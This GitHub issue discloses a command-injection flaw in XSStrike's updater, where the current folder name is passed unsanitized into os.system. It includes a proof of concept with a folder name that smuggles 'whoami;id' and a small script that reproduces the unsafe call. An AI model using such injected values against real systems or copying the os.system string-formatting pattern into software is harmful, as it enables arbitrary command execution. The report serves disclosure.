Vulnerability - Executing commands with unsanitized folder name

Question

Vulnerability - Executing commands with unsanitized folder name

randsec opened this issue 5 years ago · 0 comments

randsec commented 5 years ago

Impact

What kind of vulnerability is it?
Command execution over an unsanitized folder name.

Vulnerable file

XSStrike/core/updater.py

Vulnerable code

line 33,34: os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
The folder variable is taken from the current directory.
lines 26,27:

currentPath = os.getcwd().split('/')
folder = currentPath[-1]

If the user creates a folder with a linux command on it, the command will be executed.

POC

Create folder with command injection on it:
mkdir "command_injection;whoami;id"

Call os.system:
os.system( 'git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))

The system will clone the repo and then will execute commands: whoami; id

Below I wrote a POC. It's the same os.system call but modified to list the folder's contents instead of clone a repo. It won't affect exploitability.

import os

currentPath = os.getcwd().split('/')
folder = currentPath[-1]

print ("[i] Current folder name: {}".format(folder))
print ("[!] I'm going to call the os.system command!...")
os.system('ls %s' % (folder))